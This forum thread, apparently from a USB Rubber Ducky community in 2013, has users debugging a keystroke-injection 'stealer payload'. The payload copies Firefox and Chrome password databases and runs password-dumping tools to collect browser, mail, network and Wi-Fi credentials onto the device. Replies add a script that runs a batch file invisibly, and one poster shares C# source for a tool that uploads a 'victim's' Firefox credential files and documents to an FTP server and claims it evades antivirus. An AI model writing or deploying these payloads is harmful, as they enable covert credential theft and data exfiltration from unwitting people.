[NEED HELP] With an stealer payload

[h4x0r666]

What is wrong with this? I just got my rubber ducky but its not doing what i want.. it just opens some random things and type the rest of the code there.. i made the inject.bin with http://www.iducke.com/Encoder/ because i have no linux beside me at the moment-.-"

this is the payload:

REM ######################################################################################################
REM # Author: H4x0r666											 #
REM # OS Designed and Tested on: Windows Vista Home Basic						 #
REM # 													 #
REM # This script was developed and intended to:                                                         #
REM #                                                                                                    #
REM #   1.) Copy the Firefox key3.db & signons.sqlite (as passwords backup)                              #
REM #   2.) Copy the Google Chrome Login Data (as passwords backup)                                      #
REM #   3.) Starts iepv.exe to copy the Internet Explorer passwords                                      #
REM #   4.) Starts OperaPassView.exe to copy the Opera passwords                                         #
REM #   5.) Starts mailpv.exe to copy the mail passwords                                                 #
REM #   6.) Starts BulletsPassView.exe to copy the passwords behind bullets (the hidden passwords..)     #
REM #   7.) Starts netpass.exe to copy the net passwords                                                 #
REM #   8.) Starts WirelessKeyView.exe to copy the wireless keys                                         #
REM #                                                                                                    #
REM # All through cmd commands..                                                                         #
REM ######################################################################################################
DELAY 500
GUI d
DELAY 500
CONTROL ESCAPE
DELAY 200
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 400
CTRL-SHIFT ENTER
DELAY 400
LEFT
ENTER
DELAY 750
ALT SPACE
STRING m
DOWNARROW
REPEAT 100
ENTER
DELAY 25
STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "H4X0R666"') do set myd=%d
DELAY 100
STRING cd %AppData%\Mozilla\Firefox\Profiles
ENTER
STRING cd
SPACE
TAB
ENTER
STRING COPY key3.db %homepath%\Contacts
ENTER
STRING COPY signons.sqlite %homepath%\Contacts
ENTER
STRING MOVE /Y %homepath%\Contacts\key3.db %myd%
ENTER
STRING MOVE /Y %homepath%\Contacts\signons.sqlite %myd%
ENTER
DELAY 100
STRING cd %LocalAppData%\Google\Chrome\User Data\Default
ENTER
STRING COPY "Login Data"
SPACE
STRING %homepath%\Contacts
ENTER
STRING MOVE /Y "%homepath%\Contacts\Login Data"
SPACE
STRING %myd%
ENTER
DELAY 200
STRING %myd%\Programs\iepv.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING ie_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\OperaPassView.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING opera_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\mailpv.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING mail_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\BulletsPassView.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING bb_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\netpass.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING net_passwords.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING %myd%\Programs\WirelessKeyView.exe
ENTER
DELAY 2000
CTRL a
DELAY 200
CTRL s
DELAY 200
STRING wireless_keys.txt
ENTER
DELAY 2000
ALT F4
DELAY 200
STRING exit
ENTER 

EDITED AGAIN..... Please see my last post^^

Edited February 28, 2013 by h4x0r666
added spoiler tag

[sober]

try a 5000 ms delay at beginning as well as STRING COPY key3.db %homepath%\Contacts needs a file name specified on copys for starters

[h4x0r666]

I need it to start cmd as administrator.. and i have a question also^^ What happens if an AV detects a malicious file? because the last program somehow got a false warning detected but i ignored it with my AV so i don't know what would happen if everything worked but it still got detected? I am not going to crypt it :P to much work^^ But i can't make the inject.bin if i use CTRL-SHIFT ESC :( it gives me an error so i have to find another way to open cmd as admin.. (changed first line because it doesn't need to start with GUI r but just with GUI i guess? (the start menu..) same as CTRL-SHIFT ESC? please someone help fixing it..

[no42]

I thought:

• CTRL-SHIFT ESC -Start task manager
• CTRL-SHIFT ENTER - Run as Admin

Also

for /f %d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%d

only needs to be done once, then you can use the following below (less to type):

%myd%/whatever.exe

Edited February 28, 2013 by midnitesnake

[h4x0r666]

Yeah i ment CONTROL ESCAPE instead of CTRL+SHIFT+ESC.. but the the http://www.iducke.com/Encoder/ gives the following error..

CTRL-SHIFT ENTER is an unrecognized command

EDIT: This works though..

GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER 

But i need it to start as admin and thats not the case with that code because when i start cmd through CONTROL ESCAPE > CMD > CTRL-SHIFT ENTER (manually) it can start any program directly as admin without asking again but with the above code it may look like it started as admin but its not because if you try to start a program it will still ask to accept or cancel..

Edited February 28, 2013 by h4x0r666

[no42]

http://www.iducke.com/Encoder/

Uses Encoder v1. Things like CTRL-SHIFT X, where introduced in Encoder v2+.

I suggest you download the updated Encoder from ducky-decode, and use that instead of the now outdated-IDE.

[overwraith]

CTRL-SHIFT ENTER
 

replace with:

CTRL SHIFT ENTER
 

[h4x0r666]

I edited the whole payload again.. i am trying all kinds of stuff but it just doesn't do what i want it to do, please someone help me^^

I used the encoder 2.3 so yes it made the inject.bin succesfully but there must be something with the script..

STRING for /f %d in ('wmic volume get driveletter^, label ^| findstr "H4X0R666"') do set myd=%d

That above line only works when i have the sdcard in my reader but not in the ducky (and yes its called h4x0r666) but that can't be the problem.

and is there something with the repeat 100 because its not going down.. someone please try and test it and if possible give me the inject.bin & modified payload.

Manually almost everything does as i want.. but the ducky doesnt^^

[overwraith]

Unfortunately it takes time to mount the SD card before the executables on it can be accessed. The script probably tried accessing them before the drive had been mounted. Take a look at the payload "Run EXE from SD" on the wiki. Posting here also. The payload waits for the SD to mount.

REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts. 
DELAY 4000
REM Using the run command for a broader OS base.
GUI R
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
DELAY 25
REM Make batch file that waits for SD card to mount. 
REM Delete batch file if already exists
DELAY 25
STRING erase /Q DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING copy con DuckyWait.bat
DELAY 25
ENTER
DELAY 25
REM DuckyWait.bat
DELAY 25
STRING :while1
DELAY 25
ENTER
DELAY 25
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"') do set myd=%%d
DELAY 25
ENTER
DELAY 25
STRING if Exist %myd% (
DELAY 25
ENTER
DELAY 25
STRING goto break
DELAY 25
ENTER
DELAY 25
STRING )
DELAY 25
ENTER
DELAY 25
STRING timeout /t 30
DELAY 25
ENTER
DELAY 25
STRING goto while1
DELAY 25
ENTER
DELAY 25
STRING :break
DELAY 25
ENTER
DELAY 25
REM Continue script.
DELAY 25
STRING %myd%\myEXE.bat
DELAY 25
ENTER
DELAY 25
CONTROL z
DELAY 25
ENTER
DELAY 25
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
DELAY 25
REM Delete vbs file if already exists
DELAY 25
STRING erase /Q invis.vbs
DELAY 25
ENTER
DELAY 25
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
DELAY 25
STRING copy con invis.vbs
DELAY 25
ENTER
DELAY 25
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
DELAY 25
ENTER
DELAY 25
CONTROL Z
DELAY 25
ENTER
DELAY 25
REM RUN THE BATCH FILE
DELAY 25
STRING wscript.exe invis.vbs DuckyWait.bat
DELAY 25
ENTER
DELAY 25
STRING EXIT
ENTER

I seem to remember that one of the firmware versions had a feature where pressing the button would replay the script. This would be another solution to the problem. Yet another solution would be to make the ducky execute when using one of the keyboard modifiers like num lock or scroll lock.

Edited February 28, 2013 by overwraith

[overwraith]

You probably should also remove the ALT + F4 from the script also, because the command prompt doesn't close when you use ALT + F4.

[Dnucna]

Hmm,

I'm not sure to have programmed the ^ character because in french it's a dead key (^ then space) so I haven't tested this case.

Have you an error or warning message during the encoding ?

Dnu

[h4x0r666]

Np encoding goes smoothly and the ALT F4 is to close the extra windows from iepv.exe, operapassview.exe, mailpv.exe .. etc and yes i have looked over that script but how long does it needs to take to see my sdcard? it sees my ducky directly.. so since he also executes the inject.bin (from the sdcard) why doesn't he see the sdcard with the command? and why isnt the (hide window) working? i used the snippets from the official payloads... ..

[overwraith]

I am not entirely sure why the down arrows are not working. The hide window script worked fine a month or so ago. I am thinking something either in the encoder or on the system changed. It is not even working on my computer now. Whatever is going on I am very cross.

[overwraith]

Could the firmware upgrade be causing the down arrow and repeat commands not to work?

[overwraith]

I got a quick fix. Replace the

REPEAT 100
 

with 100 DOWNARROWs. For some reason the Repeat command doesn't work correctly.

[ApacheTech Consultancy]

I've done this an easier way, I think. I've made a small, stealthy C#.NET file which uploads files to my FTP server. It's programmed with lots of try...catch blocks that simply gracefully degrade the program if it comes across any errors at all. I call it Firefox Extinguisher.

There's currently four flavours of the program:

FFE: Mission Critical - Uploads key3.db, signons.sqlite and cert8.db of all profiles (scans profiles.ini for non-standard installations).

FFE: Sidejacker - The same as above, but includes cookies.sqlite, places.sqlite and any bookmark backups.

FFE: Clone Wars - Uploads the entirety of any Firefox profile path found.

FFE: DEFCON1 - Uploads all Firefox profiles, My Pictures, My Documents and acts as a daemon watching for changes in any Sidejacker files, reuploads any updated files and persists through reboot. The memory footprint is only about 120KB on idle.

All versions come with LockSafing, allowing files to be uploaded, even if they are currently in use (i.e. if Firefox is open and in use).

I know it's slightly on a tangent to the thread, but if yo do have any background in programming, or fancy playing around with .NET, it's a relatively simple app to write and a lot easier to run with the duck, using the wget and execute script.

[no42]

Repeat command is not supported in the duck encoder.jar (only the ide which is v1 and now outdated).

Down arrow, is based off the basic hid mapping keyboard.properties, or corrected by your individual country-code.properties file; if this is incorrect please inform us of the patch?

The firmware just echos commands from the encoder, you could try "DOWN" rather than "DOWNARROW"

[h4x0r666]

I don't think it does the down key at all look at this screenshot i just made.. (just before it quitted)

Yess.. Sorry if you don't understand everything, i'm dutch but you can guess the output..

And yes ApacheTech Consultancy, i'm interested if you could show us some example payload with your nice file :D

and.. for /f %d in ('wmic volume get driveletter^, label ^| findstr "H4X0R666"') do set myd=%d

i just waited and tried it some more while the ducky did his thing (screenshot..) but it can't find the sdcard.. i wonder how it executes the inject.bin if the sd directory isnt detected o.0 well its my first day of using my ducky but anyway.. feels bad that it failed

Edited March 1, 2013 by h4x0r666

[ApacheTech Consultancy]

The FTP Wrapper class I'm using is here: http://netftp.codeplex.com/releases/view/95632

The main bulk of the program is written using Extension Methods. These are the main ones. Please excuse the lack of annotation.

using System;
using System.IO;
using System.Windows.Forms;
using Ftp = System.Net.FtpClient;

namespace ffe
{
    public static class ExtensionsMethods
    {
        public static Ftp.FtpClient ftp = new Ftp.FtpClient()
        {
            Host = "REDACTED",
            Credentials = new System.Net.NetworkCredential("REDACTED", "REDACTED"),
            DataConnectionType = Ftp.FtpDataConnectionType.PASVEX,
        };

        public static string baseDir =
            String.Format(@"{0}/{1}", Environment.MachineName, Environment.UserName);

        public static string ToFtpPath(this String s, string basePath, string section)
        {
            return String.Format(@"{0}/{1}/{2}",
                baseDir, section, s.Substring(basePath.Length).Replace(@"\", @"/"));
        }

        public static bool ExistsOnServer(this FileInfo f, string section, string basePath)
        {
            try
            {
                ftp.Connect();
                if (ftp.FileExists(f.FullName.ToFtpPath(basePath, section)))
                {
                    return true;
                }
                else
                {
                    return false;
                }
            }
            catch (Exception)
            {
                Application.Exit();
                return false;
            }
            finally
            {
                ftp.Disconnect();
            }
        }

        public static void Upload(this FileInfo f, string section, string basePath)
        {
            FileInfo ls; 
            { try { ls = f.LockSafe(); } catch (Exception) { return; } }
            if (ls.Length == 0) return;
            byte[] b = File.ReadAllBytes(ls.FullName);
            string rPath = f.FullName.ToFtpPath(basePath, section);
            string rDir = rPath.Substring(0, rPath.LastIndexOf("/"));
            try
            {
                ftp.SetDataType(Ftp.FtpDataType.Binary);
                { try { ftp.Connect(); } catch (Exception) { return; } }
                if (!ftp.DirectoryExists(rDir)) { ftp.CreateDirectory(rDir); }
                using (Stream o = ftp.OpenWrite(f.FullName.ToFtpPath(basePath, section)))
                {
                    Console.Write(f.FullName.ToFtpPath(basePath, section) + " ..... ");
                    try
                    {
                        while (o.Position <= b.Length) { o.Write(b, 0, b.Length); }
                        Console.WriteLine("[ OK ]");
                    }
                    catch (Exception ex)
                    {
                        Console.WriteLine("[ FAILED ]");
                        Console.WriteLine("Error:" + ex.Message);
                    }
                }
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error:" + ex.Message);
            }
            finally
            {
                f.CleanLockSafe();
                ftp.Disconnect();
            }
        }

        public static FileInfo LockSafe(this FileInfo file)
        {
            // Create a file stream.
            FileStream stream = null;

            try
            {
                // Try to open the file.
                stream = file.Open(FileMode.Open, FileAccess.ReadWrite, FileShare.None);
            }
            catch (IOException)
            {
                // The file is unavailable because it is:
                // Still being written to or is being processed by another thread.
                file.CleanLockSafe();
                File.Copy(file.FullName, file.FullName + ".ffe");
                return new FileInfo(file.FullName + ".ffe");
            }
            finally
            {
                if (stream != null)
                    stream.Close();
            }

            // File is not locked
            return file;
        }

        public static void CleanLockSafe(this FileInfo f)
        {
            if (File.Exists(f.FullName + ".ffe"))
            {
                File.Delete(f.FullName + ".ffe");
            }
        }
    }
}

Then, just a very simple controller class for the victim.

using System;
using System.Collections.Generic;
using System.Linq;
using System.IO;
using System.Net;

namespace ffe
{
    public static class Victim
    {
        public static bool IsOnline
        {
            get
            {
                try
                {
                    using (var client = new WebClient())
                    using (var stream = client.OpenRead("http://www.google.com"))
                    {
                        return true;
                    }
                }
                catch
                {
                    return false;
                }
            }
        }

        public static string Documents
        {
            get
            {
                return Environment.GetFolderPath(Environment.SpecialFolder.MyDocuments) + @"\";
            }
        }
        public static string Pictures
        {
            get
            {
                return Environment.GetFolderPath(Environment.SpecialFolder.MyPictures) + @"\";
            }
        }
        public static string AppData
        {
            get
            {
                return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + @"\";
            }
        }
        public static string FirefoxProfiles
        {
            get
            {
                return Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)
                     + @"\Mozilla\Firefox\";
            }
        }
        public static string ProgramFiles
        {
            get
            {
                return Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + @"\";
            }
        }
        public static string Downloads
        {
            get
            {
                return Environment.GetFolderPath(Environment.SpecialFolder.UserProfile)
                    + @"\Downloads";
            }
        }
    }
}

And finally, the file lists themselves:

using System.Collections.Generic;
using System.IO;
using System.Linq;

namespace ffe
{
    public static class FFE
    {
        public static List<FileInfo> MissionCriticalFileList
        {
            get
            {
                // Gather a list of files.
                List<FileInfo> tmpList = new List<FileInfo>();
                string[] dirs = Directory.GetDirectories(
                    Victim.FirefoxProfiles, "*", SearchOption.TopDirectoryOnly);
                foreach (string dir in dirs)
                {
                    if (!dir.EndsWith("history"))
                    {
                        Directory.EnumerateFiles
                            (Victim.FirefoxProfiles, "*", SearchOption.AllDirectories).Where((p)
                                => p.EndsWith("signons.sqlite")
                                || p.EndsWith("key3.db")
                                || p.EndsWith("cert8.db"))
                        .ToList<string>()
                        .ForEach((p) => tmpList.Add(new FileInfo(p)));
                    }
                }
                return tmpList;
            }
        }

        public static List<FileInfo> FullProfilesList
        {
            get
            {
                // Gather a list of files.
                List<FileInfo> tmpList = new List<FileInfo>();
                string[] dirs = Directory.GetDirectories(
                    Victim.FirefoxProfiles, "*", SearchOption.TopDirectoryOnly);
                foreach (string dir in dirs)
                {
                    Directory.EnumerateFiles
                        (Victim.FirefoxProfiles, "*", SearchOption.AllDirectories).Where((p)
                            => (!p.Contains("minidumps")))
                        .ToList<string>()
                        .ForEach((p) => tmpList.Add(new FileInfo(p)));
                }
                return tmpList;
            }
        }

        public static List<FileInfo> Documents
        {
            get
            {
                List<FileInfo> tmpList = new List<FileInfo>();

                // Gather a list of the topmost directories.
                string[] dirs = Directory.GetDirectories(Victim.Documents, "*",
                    SearchOption.TopDirectoryOnly);

                // Cycle through each top layer directory.
                foreach (string dir in dirs)
                {
                    // If the folder is write-protected, skip it.
                    if (!dir.EndsWith("My Music")
                      & !dir.EndsWith("My Pictures")
                      & !dir.EndsWith("My Videos"))
                    {
                        // Add all files in all readable subdirectories to a list.
                        Directory.GetFiles(dir, "*.*", SearchOption.AllDirectories)
                            .ToList<string>()
                            .ForEach((p) => tmpList.Add(new FileInfo(p)));
                    }
                }
                return tmpList;
            }
        }
    }
}

Once you have all that, it's relatively self explanatory what goes where.

FFE.FullProfilesList.ForEach((p) => p.Upload("Firefox", Victim.FirefoxProfiles));

It's fully undetected on all of the online av scraper sites I've tried.

[h4x0r666]

Nice haha but anyway i got the DOWN thing working.. by replacing:

ALT SPACE
STRING m
DOWNARROW
REPEAT 100
ENTER

With:

ALT SPACE
DOWNARROW
ENTER
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
DOWNARROW
ENTER

(But then 100 times the DOWNARROW because i guess... .. the repeat function isnt even working?)

But do i need something extra to be able to run files from the SDcard while being mounted by the ducky? o.0

please explain :D

[no42]

But do i need something extra to be able to run files from the SDcard while being mounted by the ducky? o.0

please explain :D

You need TwinDuck Firmware.

What firmware are you running at the moment?

[no42]

Just implemented the REPEAT command in Encoder v2.4.

If you could please participate in testing, and post feedback here.

Thanks

Snake

[h4x0r666]

The encoding process in 2.3 is done in less then a second while in 2.4 it or takes very very long.. or it just doesn't work but i quitted after waiting a couple minutes is it working for you correctly just like in 2.3 ? (I have Windows Home Basic, if the OS is the problem which wasnt on 2.3) and i have no idea what firmware i have at the moment.. since i just got my ducky i guess the default firmware it should have? What is the difference in TwinDuck Firmware? what do you recommend me.. ^_^

[ApacheTech Consultancy]

The TwinDuck firmware allows you to use the Duck as a Mass Storage Device, as well as a HID. There is a step by step guide to flashing your duck with the new firmware in the Stickies on the forum.

Which duck are you using currently, i.e. what colour is the board? This will give us an indication of which stock firmware you are currently using. It is possible that commands which have either been added or depreciated are causing errors with your compiler. If you use the TwinDuck Firmware, make sure you use the latest versions of the compiler and make sure your Java files are up to date (or at least Java 1.7.0). This will give you the best chance of completion.

[h4x0r666]

i got the latest (green) board, i hope i don't fuck my ducky up xD would be awesome if someone could help tomorrow through teamviewer or something.. (for less chance of failing) >.<"